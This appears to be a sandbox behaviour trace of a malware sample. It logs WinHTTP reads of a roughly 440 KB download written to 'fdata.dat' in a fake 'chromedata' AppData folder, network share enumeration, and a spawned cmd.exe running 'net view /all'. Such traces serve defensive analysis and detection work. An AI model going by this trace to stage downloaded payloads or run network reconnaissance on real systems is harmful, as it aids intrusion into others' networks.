	[0235.008] WinHttpReadData (in: hRequest=0xf3b98, lpBuffer=0x184e204, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x5bfd9c | out: lpBuffer=0x184e204*, lpdwNumberOfBytesRead=0x5bfd9c*=0x2000) returned 1
	[0235.008] WinHttpQueryDataAvailable (in: hRequest=0xf3b98, lpdwNumberOfBytesAvailable=0x5bfd9c | out: lpdwNumberOfBytesAvailable=0x5bfd9c*=0x2000) returned 1
	[0235.009] RtlReAllocateHeap (Heap=0x1790000, Flags=0x8, Ptr=0x180f578, Size=0x42c8c) returned 0x180f578
	[0235.009] WinHttpReadData (in: hRequest=0xf3b98, lpBuffer=0x1850204, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x5bfd9c | out: lpBuffer=0x1850204*, lpdwNumberOfBytesRead=0x5bfd9c*=0x2000) returned 1
	[0235.009] WinHttpQueryDataAvailable (in: hRequest=0xf3b98, lpdwNumberOfBytesAvailable=0x5bfd9c | out: lpdwNumberOfBytesAvailable=0x5bfd9c*=0x2000) returned 1
	[0235.010] RtlReAllocateHeap (Heap=0x1790000, Flags=0x8, Ptr=0x180f578, Size=0x44c8c) returned 0x180f578
	[0235.010] WinHttpReadData (in: hRequest=0xf3b98, lpBuffer=0x1852204, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x5bfd9c | out: lpBuffer=0x1852204*, lpdwNumberOfBytesRead=0x5bfd9c*=0x2000) returned 1
	[0235.010] WinHttpQueryDataAvailable (in: hRequest=0xf3b98, lpdwNumberOfBytesAvailable=0x5bfd9c | out: lpdwNumberOfBytesAvailable=0x5bfd9c*=0x1580) returned 1
	[0235.010] RtlReAllocateHeap (Heap=0x1790000, Flags=0x8, Ptr=0x180f578, Size=0x4620c) returned 0x180f578
	[0235.010] WinHttpReadData (in: hRequest=0xf3b98, lpBuffer=0x1854204, dwNumberOfBytesToRead=0x1580, lpdwNumberOfBytesRead=0x5bfd9c | out: lpBuffer=0x1854204*, lpdwNumberOfBytesRead=0x5bfd9c*=0x1580) returned 1
	[0235.011] WinHttpQueryDataAvailable (in: hRequest=0xf3b98, lpdwNumberOfBytesAvailable=0x5bfd9c | out: lpdwNumberOfBytesAvailable=0x5bfd9c*=0x2000) returned 1
	[0235.021] RtlReAllocateHeap (Heap=0x1790000, Flags=0x8, Ptr=0x180f578, Size=0x4820c) returned 0x180f578
	[0235.022] WinHttpReadData (in: hRequest=0xf3b98, lpBuffer=0x1855784, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x5bfd9c | out: lpBuffer=0x1855784*, lpdwNumberOfBytesRead=0x5bfd9c*=0x2000) returned 1
	[0235.022] WinHttpQueryDataAvailable (in: hRequest=0xf3b98, lpdwNumberOfBytesAvailable=0x5bfd9c | out: lpdwNumberOfBytesAvailable=0x5bfd9c*=0x1e64) returned 1
	[0235.022] RtlReAllocateHeap (Heap=0x1790000, Flags=0x8, Ptr=0x180f578, Size=0x4a070) returned 0x180f578
	[0235.023] WinHttpReadData (in: hRequest=0xf3b98, lpBuffer=0x1857784, dwNumberOfBytesToRead=0x1e64, lpdwNumberOfBytesRead=0x5bfd9c | out: lpBuffer=0x1857784*, lpdwNumberOfBytesRead=0x5bfd9c*=0x1e64) returned 1
	[0235.023] WinHttpQueryDataAvailable (in: hRequest=0xf3b98, lpdwNumberOfBytesAvailable=0x5bfd9c | out: lpdwNumberOfBytesAvailable=0x5bfd9c*=0x16b0) returned 1
	[0235.023] RtlReAllocateHeap (Heap=0x1790000, Flags=0x8, Ptr=0x180f578, Size=0x4b720) returned 0x180f578
	[0235.024] WinHttpReadData (in: hRequest=0xf3b98, lpBuffer=0x18595e8, dwNumberOfBytesToRead=0x16b0, lpdwNumberOfBytesRead=0x5bfd9c | out: lpBuffer=0x18595e8*, lpdwNumberOfBytesRead=0x5bfd9c*=0x16b0) returned 1
	[0235.024] WinHttpQueryDataAvailable (in: hRequest=0xf3b98, lpdwNumberOfBytesAvailable=0x5bfd9c | out: lpdwNumberOfBytesAvailable=0x5bfd9c*=0x2000) returned 1
	[0235.419] RtlReAllocateHeap (Heap=0x1790000, Flags=0x8, Ptr=0x180f578, Size=0x4d720) returned 0x180f578
	[0235.419] WinHttpReadData (in: hRequest=0xf3b98, lpBuffer=0x185ac98, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x5bfd9c | out: lpBuffer=0x185ac98*, lpdwNumberOfBytesRead=0x5bfd9c*=0x2000) returned 1
	[0235.419] WinHttpQueryDataAvailable (in: hRequest=0xf3b98, lpdwNumberOfBytesAvailable=0x5bfd9c | out: lpdwNumberOfBytesAvailable=0x5bfd9c*=0xd60) returned 1
	[0235.419] RtlReAllocateHeap (Heap=0x1790000, Flags=0x8, Ptr=0x180f578, Size=0x4e480) returned 0x180f578
	[0235.419] WinHttpReadData (in: hRequest=0xf3b98, lpBuffer=0x185cc98, dwNumberOfBytesToRead=0xd60, lpdwNumberOfBytesRead=0x5bfd9c | out: lpBuffer=0x185cc98*, lpdwNumberOfBytesRead=0x5bfd9c*=0xd60) returned 1
	[0235.419] WinHttpQueryDataAvailable (in: hRequest=0xf3b98, lpdwNumberOfBytesAvailable=0x5bfd9c | out: lpdwNumberOfBytesAvailable=0x5bfd9c*=0x2000) returned 1
	[0235.437] RtlReAllocateHeap (Heap=0x1790000, Flags=0x8, Ptr=0x180f578, Size=0x50480) returned 0x180f578
	[0235.437] WinHttpReadData (in: hRequest=0xf3b98, lpBuffer=0x185d9f8, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x5bfd9c | out: lpBuffer=0x185d9f8*, lpdwNumberOfBytesRead=0x5bfd9c*=0x2000) returned 1
	[0235.437] WinHttpQueryDataAvailable (in: hRequest=0xf3b98, lpdwNumberOfBytesAvailable=0x5bfd9c | out: lpdwNumberOfBytesAvailable=0x5bfd9c*=0x2000) returned 1
	[0235.437] RtlReAllocateHeap (Heap=0x1790000, Flags=0x8, Ptr=0x180f578, Size=0x52480) returned 0x180f578
	[0235.437] WinHttpReadData (in: hRequest=0xf3b98, lpBuffer=0x185f9f8, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x5bfd9c | out: lpBuffer=0x185f9f8*, lpdwNumberOfBytesRead=0x5bfd9c*=0x2000) returned 1
	[0235.437] WinHttpQueryDataAvailable (in: hRequest=0xf3b98, lpdwNumberOfBytesAvailable=0x5bfd9c | out: lpdwNumberOfBytesAvailable=0x5bfd9c*=0x2000) returned 1
	[0235.438] RtlReAllocateHeap (Heap=0x1790000, Flags=0x8, Ptr=0x180f578, Size=0x54480) returned 0x180f578
	[0235.438] WinHttpReadData (in: hRequest=0xf3b98, lpBuffer=0x18619f8, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x5bfd9c | out: lpBuffer=0x18619f8*, lpdwNumberOfBytesRead=0x5bfd9c*=0x2000) returned 1
	[0235.438] WinHttpQueryDataAvailable (in: hRequest=0xf3b98, lpdwNumberOfBytesAvailable=0x5bfd9c | out: lpdwNumberOfBytesAvailable=0x5bfd9c*=0x2000) returned 1
	[0235.438] RtlReAllocateHeap (Heap=0x1790000, Flags=0x8, Ptr=0x180f578, Size=0x56480) returned 0x180f578
	[0235.438] WinHttpReadData (in: hRequest=0xf3b98, lpBuffer=0x18639f8, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x5bfd9c | out: lpBuffer=0x18639f8*, lpdwNumberOfBytesRead=0x5bfd9c*=0x2000) returned 1
	[0235.438] WinHttpQueryDataAvailable (in: hRequest=0xf3b98, lpdwNumberOfBytesAvailable=0x5bfd9c | out: lpdwNumberOfBytesAvailable=0x5bfd9c*=0x2000) returned 1
	[0235.439] RtlReAllocateHeap (Heap=0x1790000, Flags=0x8, Ptr=0x180f578, Size=0x58480) returned 0x180f578
	[0235.439] WinHttpReadData (in: hRequest=0xf3b98, lpBuffer=0x18659f8, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x5bfd9c | out: lpBuffer=0x18659f8*, lpdwNumberOfBytesRead=0x5bfd9c*=0x2000) returned 1
	[0235.439] WinHttpQueryDataAvailable (in: hRequest=0xf3b98, lpdwNumberOfBytesAvailable=0x5bfd9c | out: lpdwNumberOfBytesAvailable=0x5bfd9c*=0x2000) returned 1
	[0235.439] RtlReAllocateHeap (Heap=0x1790000, Flags=0x8, Ptr=0x180f578, Size=0x5a480) returned 0x180f578
	[0235.439] WinHttpReadData (in: hRequest=0xf3b98, lpBuffer=0x18679f8, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x5bfd9c | out: lpBuffer=0x18679f8*, lpdwNumberOfBytesRead=0x5bfd9c*=0x2000) returned 1
	[0235.439] WinHttpQueryDataAvailable (in: hRequest=0xf3b98, lpdwNumberOfBytesAvailable=0x5bfd9c | out: lpdwNumberOfBytesAvailable=0x5bfd9c*=0x2000) returned 1
	[0235.440] RtlReAllocateHeap (Heap=0x1790000, Flags=0x8, Ptr=0x180f578, Size=0x5c480) returned 0x180f578
	[0235.440] WinHttpReadData (in: hRequest=0xf3b98, lpBuffer=0x18699f8, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x5bfd9c | out: lpBuffer=0x18699f8*, lpdwNumberOfBytesRead=0x5bfd9c*=0x2000) returned 1
	[0235.440] WinHttpQueryDataAvailable (in: hRequest=0xf3b98, lpdwNumberOfBytesAvailable=0x5bfd9c | out: lpdwNumberOfBytesAvailable=0x5bfd9c*=0x2000) returned 1
	[0235.440] RtlReAllocateHeap (Heap=0x1790000, Flags=0x8, Ptr=0x180f578, Size=0x5e480) returned 0x180f578
	[0235.440] WinHttpReadData (in: hRequest=0xf3b98, lpBuffer=0x186b9f8, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x5bfd9c | out: lpBuffer=0x186b9f8*, lpdwNumberOfBytesRead=0x5bfd9c*=0x2000) returned 1
	[0235.440] WinHttpQueryDataAvailable (in: hRequest=0xf3b98, lpdwNumberOfBytesAvailable=0x5bfd9c | out: lpdwNumberOfBytesAvailable=0x5bfd9c*=0x2000) returned 1
	[0235.440] RtlReAllocateHeap (Heap=0x1790000, Flags=0x8, Ptr=0x180f578, Size=0x60480) returned 0x180f578
	[0235.440] WinHttpReadData (in: hRequest=0xf3b98, lpBuffer=0x186d9f8, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x5bfd9c | out: lpBuffer=0x186d9f8*, lpdwNumberOfBytesRead=0x5bfd9c*=0x2000) returned 1
	[0235.440] WinHttpQueryDataAvailable (in: hRequest=0xf3b98, lpdwNumberOfBytesAvailable=0x5bfd9c | out: lpdwNumberOfBytesAvailable=0x5bfd9c*=0x2000) returned 1
	[0235.441] RtlReAllocateHeap (Heap=0x1790000, Flags=0x8, Ptr=0x180f578, Size=0x62480) returned 0x180f578
	[0235.441] WinHttpReadData (in: hRequest=0xf3b98, lpBuffer=0x186f9f8, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x5bfd9c | out: lpBuffer=0x186f9f8*, lpdwNumberOfBytesRead=0x5bfd9c*=0x2000) returned 1
	[0235.441] WinHttpQueryDataAvailable (in: hRequest=0xf3b98, lpdwNumberOfBytesAvailable=0x5bfd9c | out: lpdwNumberOfBytesAvailable=0x5bfd9c*=0x2000) returned 1
	[0235.441] RtlReAllocateHeap (Heap=0x1790000, Flags=0x8, Ptr=0x180f578, Size=0x64480) returned 0x180f578
	[0235.441] WinHttpReadData (in: hRequest=0xf3b98, lpBuffer=0x18719f8, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x5bfd9c | out: lpBuffer=0x18719f8*, lpdwNumberOfBytesRead=0x5bfd9c*=0x2000) returned 1
	[0235.441] WinHttpQueryDataAvailable (in: hRequest=0xf3b98, lpdwNumberOfBytesAvailable=0x5bfd9c | out: lpdwNumberOfBytesAvailable=0x5bfd9c*=0x2000) returned 1
	[0235.441] RtlReAllocateHeap (Heap=0x1790000, Flags=0x8, Ptr=0x180f578, Size=0x66480) returned 0x180f578
	[0235.441] WinHttpReadData (in: hRequest=0xf3b98, lpBuffer=0x18739f8, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x5bfd9c | out: lpBuffer=0x18739f8*, lpdwNumberOfBytesRead=0x5bfd9c*=0x2000) returned 1
	[0235.441] WinHttpQueryDataAvailable (in: hRequest=0xf3b98, lpdwNumberOfBytesAvailable=0x5bfd9c | out: lpdwNumberOfBytesAvailable=0x5bfd9c*=0x2000) returned 1
	[0235.442] RtlReAllocateHeap (Heap=0x1790000, Flags=0x8, Ptr=0x180f578, Size=0x68480) returned 0x180f578
	[0235.442] WinHttpReadData (in: hRequest=0xf3b98, lpBuffer=0x18759f8, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x5bfd9c | out: lpBuffer=0x18759f8*, lpdwNumberOfBytesRead=0x5bfd9c*=0x2000) returned 1
	[0235.442] WinHttpQueryDataAvailable (in: hRequest=0xf3b98, lpdwNumberOfBytesAvailable=0x5bfd9c | out: lpdwNumberOfBytesAvailable=0x5bfd9c*=0x2000) returned 1
	[0235.442] RtlReAllocateHeap (Heap=0x1790000, Flags=0x8, Ptr=0x180f578, Size=0x6a480) returned 0x180f578
	[0235.442] WinHttpReadData (in: hRequest=0xf3b98, lpBuffer=0x18779f8, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x5bfd9c | out: lpBuffer=0x18779f8*, lpdwNumberOfBytesRead=0x5bfd9c*=0x2000) returned 1
	[0235.442] WinHttpQueryDataAvailable (in: hRequest=0xf3b98, lpdwNumberOfBytesAvailable=0x5bfd9c | out: lpdwNumberOfBytesAvailable=0x5bfd9c*=0x2000) returned 1
	[0235.442] RtlReAllocateHeap (Heap=0x1790000, Flags=0x8, Ptr=0x180f578, Size=0x6c480) returned 0x180f578
	[0235.442] WinHttpReadData (in: hRequest=0xf3b98, lpBuffer=0x18799f8, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x5bfd9c | out: lpBuffer=0x18799f8*, lpdwNumberOfBytesRead=0x5bfd9c*=0x2000) returned 1
	[0235.442] WinHttpQueryDataAvailable (in: hRequest=0xf3b98, lpdwNumberOfBytesAvailable=0x5bfd9c | out: lpdwNumberOfBytesAvailable=0x5bfd9c*=0x7c8) returned 1
	[0235.443] RtlReAllocateHeap (Heap=0x1790000, Flags=0x8, Ptr=0x180f578, Size=0x6cc48) returned 0x180f578
	[0235.443] WinHttpReadData (in: hRequest=0xf3b98, lpBuffer=0x187b9f8, dwNumberOfBytesToRead=0x7c8, lpdwNumberOfBytesRead=0x5bfd9c | out: lpBuffer=0x187b9f8*, lpdwNumberOfBytesRead=0x5bfd9c*=0x7c8) returned 1
	[0235.443] WinHttpQueryDataAvailable (in: hRequest=0xf3b98, lpdwNumberOfBytesAvailable=0x5bfd9c | out: lpdwNumberOfBytesAvailable=0x5bfd9c*=0x3b8) returned 1
	[0235.641] RtlReAllocateHeap (Heap=0x1790000, Flags=0x8, Ptr=0x180f578, Size=0x6d000) returned 0x180f578
	[0235.641] WinHttpReadData (in: hRequest=0xf3b98, lpBuffer=0x187c1c0, dwNumberOfBytesToRead=0x3b8, lpdwNumberOfBytesRead=0x5bfd9c | out: lpBuffer=0x187c1c0*, lpdwNumberOfBytesRead=0x5bfd9c*=0x3b8) returned 1
	[0235.641] WinHttpQueryDataAvailable (in: hRequest=0xf3b98, lpdwNumberOfBytesAvailable=0x5bfd9c | out: lpdwNumberOfBytesAvailable=0x5bfd9c*=0x0) returned 1
	[0235.642] CreateFileW (lpFileName="fdata.dat" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\fdata.dat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xe0
	[0235.643] WriteFile (in: hFile=0xe0, lpBuffer=0x180f578*, nNumberOfBytesToWrite=0x6d000, lpNumberOfBytesWritten=0x5bfd9c, lpOverlapped=0x0 | out: lpBuffer=0x180f578*, lpNumberOfBytesWritten=0x5bfd9c*=0x6d000, lpOverlapped=0x0) returned 1
	[0235.655] HeapFree (in: hHeap=0x1790000, dwFlags=0x0, lpMem=0x180f578 | out: hHeap=0x1790000) returned 1
	[0235.660] CloseHandle (hObject=0xe0) returned 1
	[0235.665] WNetOpenEnumW (in: dwScope=0x2, dwType=0x0, dwUsage=0x0, lpNetResource=0x0, lphEnum=0x5bf7dc | out: lphEnum=0x5bf7dc*=0xfd1a8) returned 0x0
	[0235.975] RtlAllocateHeap (HeapHandle=0x1790000, Flags=0x8, Size=0x4000) returned 0x1790578
	[0235.976] WNetEnumResourceW (in: hEnum=0xfd1a8, lpcCount=0x5bf7e4, lpBuffer=0x1790578, lpBufferSize=0x5bf7e0 | out: lpcCount=0x5bf7e4, lpBuffer=0x1790578, lpBufferSize=0x5bf7e0) returned 0x0
	[0235.976] WNetOpenEnumW (in: dwScope=0x2, dwType=0x0, dwUsage=0x0, lpNetResource=0x1790578, lphEnum=0x5bf22c | out: lphEnum=0x5bf22c*=0xe7dd0) returned 0x0
	[0235.981] RtlAllocateHeap (HeapHandle=0x1790000, Flags=0x8, Size=0x4000) returned 0x1794580
	[0235.982] WNetEnumResourceW (in: hEnum=0xe7dd0, lpcCount=0x5bf234, lpBuffer=0x1794580, lpBufferSize=0x5bf230 | out: lpcCount=0x5bf234, lpBuffer=0x1794580, lpBufferSize=0x5bf230) returned 0x103
	[0235.982] WNetCloseEnum (hEnum=0xe7dd0) returned 0x0
	[0235.982] HeapFree (in: hHeap=0x1790000, dwFlags=0x0, lpMem=0x1794580 | out: hHeap=0x1790000) returned 1
	[0235.982] WNetOpenEnumW (in: dwScope=0x2, dwType=0x0, dwUsage=0x0, lpNetResource=0x1790598, lphEnum=0x5bf22c | out: lphEnum=0x5bf22c*=0x0) returned 0x4b8
	[0246.013] Sleep (dwMilliseconds=0x3e8) 
	[0247.027] WNetOpenEnumW (dwScope=0x2, dwType=0x0, dwUsage=0x0, lpNetResource=0x1790598, lphEnum=0x5bf22c) 

Thread:
	id = 323
	os_tid = 0xddc


Thread:
	id = 324
	os_tid = 0xdc8


Thread:
	id = 325
	os_tid = 0xdbc


Process:
	id = "51"
	image_name = "cmd.exe"
	filename = "c:\\windows\\system32\\cmd.exe"
	page_root = "0x7ee173e0"
	os_pid = "0xbb4"
	os_integrity_level = "0x2000"
	os_privileges = "0x800000"
	monitor_reason = "child_process"
	parent_id = "40"
	os_parent_pid = "0xa70"
	cmd_line = "/c net view /all"
	cur_dir = "C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\"
	os_username = "ZGW5TDPU\\2XC7u663GxWc"
	bitness = "64"
	os_groups = "ZGW5TDPU\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ece3" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 345
	os_tid = 0xbb8

	[0239.208] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1ff7bc | out: lpSystemTimeAsFileTime=0x1ff7bc*(dwLowDateTime=0x7646eb20, dwHighDateTime=0x1d50a6a)) 
	[0239.208] GetCurrentProcessId () returned 0xbb4
	[0239.208] GetCurrentThreadId () returned 0xbb8
	[0239.208] GetTickCount () returned 0xa91d14
	[0239.208] QueryPerformanceCounter (in: lpPerformanceCount=0x1ff7b4 | out: lpPerformanceCount=0x1ff7b4*=31304586788) returned 1
	[0239.208] GetModuleHandleA (lpModuleName=0x0) returned 0x49df0000
	[0239.209] __set_app_type (_Type=0x1) 
	[0239.209] __p__fmode () returned 0x770231f4
	[0239.209] __p__commode () returned 0x770231fc
	[0239.209] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x49e121a6) returned 0x0
	[0239.209] __getmainargs (in: _Argc=0x49e14238, _Argv=0x49e14240, _Env=0x49e1423c, _DoWildCard=0, _StartInfo=0x49e14140 | out: _Argc=0x49e14238, _Argv=0x49e14240, _Env=0x49e1423c) returned 0
	[0239.209] GetCurrentThreadId () returned 0xbb8
	[0239.209] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xbb8) returned 0x38
	[0239.209] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76b10000
	[0239.209] GetProcAddress (hModule=0x76b10000, lpProcName="SetThreadUILanguage") returned 0x76b624c2
	[0239.209] SetThreadUILanguage (LangId=0x0) returned 0x409
	[0239.209] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1
	[0239.209] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ff74c | out: phkResult=0x1ff74c*=0x0) returned 0x2
	[0239.209] VirtualQuery (in: lpAddress=0x1ff783, lpBuffer=0x1ff71c, dwLength=0x1c | out: lpBuffer=0x1ff71c*(BaseAddress=0x1ff000, AllocationBase=0x100000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0239.209] VirtualQuery (in: lpAddress=0x100000, lpBuffer=0x1ff71c, dwLength=0x1c | out: lpBuffer=0x1ff71c*(BaseAddress=0x100000, AllocationBase=0x100000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c
	[0239.209] VirtualQuery (in: lpAddress=0x101000, lpBuffer=0x1ff71c, dwLength=0x1c | out: lpBuffer=0x1ff71c*(BaseAddress=0x101000, AllocationBase=0x100000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c
	[0239.209] VirtualQuery (in: lpAddress=0x103000, lpBuffer=0x1ff71c, dwLength=0x1c | out: lpBuffer=0x1ff71c*(BaseAddress=0x103000, AllocationBase=0x100000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0239.209] VirtualQuery (in: lpAddress=0x200000, lpBuffer=0x1ff71c, dwLength=0x1c | out: lpBuffer=0x1ff71c*(BaseAddress=0x200000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x40000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c
	[0239.209] GetConsoleOutputCP () returned 0x1b5
	[0239.210] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49e14260 | out: lpCPInfo=0x49e14260) returned 1
	[0239.210] SetConsoleCtrlHandler (HandlerRoutine=0x49e0e72a, Add=1) returned 1
	[0239.210] _get_osfhandle (_FileHandle=1) returned 0x158
	[0239.210] SetConsoleMode (hConsoleHandle=0x158, dwMode=0x0) returned 0
	[0239.210] _get_osfhandle (_FileHandle=1) returned 0x158
	[0239.210] GetConsoleMode (in: hConsoleHandle=0x158, lpMode=0x49e141ac | out: lpMode=0x49e141ac) returned 0
	[0239.210] _get_osfhandle (_FileHandle=0) returned 0x15c
	[0239.210] GetConsoleMode (in: hConsoleHandle=0x15c, lpMode=0x49e141b0 | out: lpMode=0x49e141b0) returned 0
	[0239.210] GetEnvironmentStringsW () returned 0x2501f8*
	[0239.210] GetProcessHeap () returned 0x240000
	[0239.210] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x8fa) returned 0x250b00
	[0239.210] FreeEnvironmentStringsW (penv=0x2501f8) returned 1
	[0239.210] GetProcessHeap () returned 0x240000
	[0239.210] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x4) returned 0x24faf8
	[0239.210] GetEnvironmentStringsW () returned 0x2501f8*
	[0239.210] GetProcessHeap () returned 0x240000
	[0239.210] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x8fa) returned 0x251408
	[0239.210] FreeEnvironmentStringsW (penv=0x2501f8) returned 1
	[0239.210] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1fe6bc | out: phkResult=0x1fe6bc*=0x40) returned 0x0
	[0239.211] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1fe6c4, lpData=0x1fe6c8, lpcbData=0x1fe6c0*=0x1000 | out: lpType=0x1fe6c4*=0x0, lpData=0x1fe6c8*=0x88, lpcbData=0x1fe6c0*=0x1000) returned 0x2
	[0239.211] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1fe6c4, lpData=0x1fe6c8, lpcbData=0x1fe6c0*=0x1000 | out: lpType=0x1fe6c4*=0x4, lpData=0x1fe6c8*=0x1, lpcbData=0x1fe6c0*=0x4) returned 0x0
	[0239.211] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1fe6c4, lpData=0x1fe6c8, lpcbData=0x1fe6c0*=0x1000 | out: lpType=0x1fe6c4*=0x0, lpData=0x1fe6c8*=0x1, lpcbData=0x1fe6c0*=0x1000) returned 0x2
	[0239.211] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1fe6c4, lpData=0x1fe6c8, lpcbData=0x1fe6c0*=0x1000 | out: lpType=0x1fe6c4*=0x4, lpData=0x1fe6c8*=0x0, lpcbData=0x1fe6c0*=0x4) returned 0x0
	[0239.211] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1fe6c4, lpData=0x1fe6c8, lpcbData=0x1fe6c0*=0x1000 | out: lpType=0x1fe6c4*=0x4, lpData=0x1fe6c8*=0x40, lpcbData=0x1fe6c0*=0x4) returned 0x0
	[0239.211] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1fe6c4, lpData=0x1fe6c8, lpcbData=0x1fe6c0*=0x1000 | out: lpType=0x1fe6c4*=0x4, lpData=0x1fe6c8*=0x40, lpcbData=0x1fe6c0*=0x4) returned 0x0
	[0239.211] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1fe6c4, lpData=0x1fe6c8, lpcbData=0x1fe6c0*=0x1000 | out: lpType=0x1fe6c4*=0x0, lpData=0x1fe6c8*=0x40, lpcbData=0x1fe6c0*=0x1000) returned 0x2
	[0239.211] RegCloseKey (hKey=0x40) returned 0x0
	[0239.211] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1fe6bc | out: phkResult=0x1fe6bc*=0x40) returned 0x0
	[0239.211] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1fe6c4, lpData=0x1fe6c8, lpcbData=0x1fe6c0*=0x1000 | out: lpType=0x1fe6c4*=0x0, lpData=0x1fe6c8*=0x40, lpcbData=0x1fe6c0*=0x1000) returned 0x2
	[0239.211] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1fe6c4, lpData=0x1fe6c8, lpcbData=0x1fe6c0*=0x1000 | out: lpType=0x1fe6c4*=0x4, lpData=0x1fe6c8*=0x1, lpcbData=0x1fe6c0*=0x4) returned 0x0
	[0239.211] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1fe6c4, lpData=0x1fe6c8, lpcbData=0x1fe6c0*=0x1000 | out: lpType=0x1fe6c4*=0x0, lpData=0x1fe6c8*=0x1, lpcbData=0x1fe6c0*=0x1000) returned 0x2
	[0239.211] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1fe6c4, lpData=0x1fe6c8, lpcbData=0x1fe6c0*=0x1000 | out: lpType=0x1fe6c4*=0x4, lpData=0x1fe6c8*=0x0, lpcbData=0x1fe6c0*=0x4) returned 0x0
	[0239.211] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1fe6c4, lpData=0x1fe6c8, lpcbData=0x1fe6c0*=0x1000 | out: lpType=0x1fe6c4*=0x4, lpData=0x1fe6c8*=0x9, lpcbData=0x1fe6c0*=0x4) returned 0x0
	[0239.211] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1fe6c4, lpData=0x1fe6c8, lpcbData=0x1fe6c0*=0x1000 | out: lpType=0x1fe6c4*=0x4, lpData=0x1fe6c8*=0x9, lpcbData=0x1fe6c0*=0x4) returned 0x0
	[0239.211] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1fe6c4, lpData=0x1fe6c8, lpcbData=0x1fe6c0*=0x1000 | out: lpType=0x1fe6c4*=0x0, lpData=0x1fe6c8*=0x9, lpcbData=0x1fe6c0*=0x1000) returned 0x2
	[0239.211] RegCloseKey (hKey=0x40) returned 0x0
	[0239.211] time (in: timer=0x0 | out: timer=0x0) returned 0x5cdadfec
	[0239.211] srand (_Seed=0x5cdadfec) 
	[0239.211] GetCommandLineW () returned="/c net view /all"
